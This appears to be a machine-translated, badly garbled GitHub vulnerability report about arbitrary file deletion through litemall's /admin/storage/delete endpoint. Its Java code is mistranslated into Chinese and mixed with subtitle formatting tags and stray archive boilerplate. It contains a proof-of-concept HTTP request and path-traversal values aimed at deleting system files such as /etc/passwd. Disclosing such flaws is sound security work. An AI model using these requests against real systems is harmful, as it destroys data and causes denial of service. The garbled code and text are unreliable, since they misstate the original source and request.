#564·litemall

/admin/storage/delete 中的任意文件删除漏洞

作者: ez-lbz创建于 2025年7月28日更新于 2025年7月28日

任意文件在`/admin/储存/删除'中的删除脆弱性

页:1

在`/admin/ storage/delete'终点处的Ltemall系统中存在任意删除文件的脆弱性。 由于用户提供的输入验证不充分,拥有删除权限的认证用户可以切换请求从服务器的文件系统中删除任何文件,包括关键系统文件. 这种脆弱性构成高风险,因为它可能直接导致拒绝提供服务或进一步损害该系统。

详细情况

脆弱性的根源在于以下代码路径:

贾瓦 @ requiresPermissions ("admin: storage: delete") (中文(简体) ). @ requiresPermissions Desc(菜单= {"系统管理","对象存储"),按钮="删除". @后映 ("/删除"). 公共对象删除 (@ requestBody LitecallStorage colorallStorage) { 字符串按键 = colorallStorage.getKey (); 如果 (StringUtils.isEmpty(键)) { 返回反应Util.badArgument (); {\fn黑体\fs22\bord1\shad0\3aHBE\4aH00\fscx67\fscy66\2cHFFFFFF\3cH808080}你觉得呢? colorallStorageService.deleteByKey(关键词); service.delete( 键); // <-- slow( 键) 返回回复Util.ok(); {\fn黑体\fs22\bord1\shad0\3aHBE\4aH00\fscx67\fscy66\2cHFFFFFF\3cH808080}你觉得呢?


“关键”参数由用户控制,直接传递给:

贾瓦
@ 覆盖
公用无效删除( 字符串文件名) {
路径文件=负载(文件名);
尝试{
文件.delete(文件);
捕获量(排除e){
logger.error(e.getMessage (), e); 页面存档备份,存于互联网档案馆.
{\fn黑体\fs22\bord1\shad0\3aHBE\4aH00\fscx67\fscy66\2cHFFFFFF\3cH808080}你觉得呢?
{\fn黑体\fs22\bord1\shad0\3aHBE\4aH00\fscx67\fscy66\2cHFFFFFF\3cH808080}你觉得呢?

由于钥匙'没有消毒或路径限制,攻击者可以提供任意路径(例如./././././etc/passwd'),从而删除任意系统文件。

POC

  • 测试在窗户。 翻译: POST/admin/储存/删除HTTP/1.1 主机:本地主机:8080 Cookie:Hm lvt 1cd9bcbae133f03a6eb19da6579aaba=175341455,1753436446,1753450237;JSESSIONID=accb3c3c3-1eda-4407-9691-000f90d200f5;X-Litecall-Admin-Token=acdcb3-3--1eda-4407-9691-000f90d200f5 sec-ch-ua:"not"A;"Brand";v="8";"铬";v="138";"Google Chrome";v="138". 出处:http://localhost:9527 sec-Fetch-Site:同名站点 接受编码:gzip、dflate、br、zstd 用户代理:Mozilla/ 5.0 (Windows NT 10.0;Win64;x64) AppleWebKit/537.36 (KHTML,类似Gecko) Chrome/138.0.0.0 Safari/537.36 (中文(简体) ). sec-Fetch-Dest: 为空 参考文献:http://localhost:9527/ 接受语:zh-CN,zh;q=0.9 内容-类型:应用程序/json;charset=UTF-8 X-Litecall-Admin-Token: acdcb3c3-1eda-4407-9691-000f90d200f5 互联网档案馆的存檔,存档日期2013-12-2. 秒-ch-ua-移动:? 塞克-法克-模式:皮层 接受: 申请/json、正文/正文、/ 秒-ch-ua-平台:"窗口" 内容-Length:227

{"id": 1,"key":"C:\用户\86138\Desktop\ a. class","名":"2.jpg","型":"image/jpeg","大小":3781"url":"http://localhost:8080/wx/storage/fetch/6fq5na4x56qvqpfm6niy.jpg","addTime":"2025-07-28 09:27:12") 更新时间:2025-07-28 09:27:12"}


<img宽="2559"高="1439" alt="Image" src="https://GitHub.com/user-attachments/assets/a6e5ed97-8218-4a06-b128-1602660839fe" / >

开采情景

1. 攻击者制作具有 "./././././重要/系统/文件 " 等恶意关键价值的请求。

2. 后端解决了这一路径,并称为 " Files.delete () " ,
. . . . . . .

内容来源: linlinjava/litemall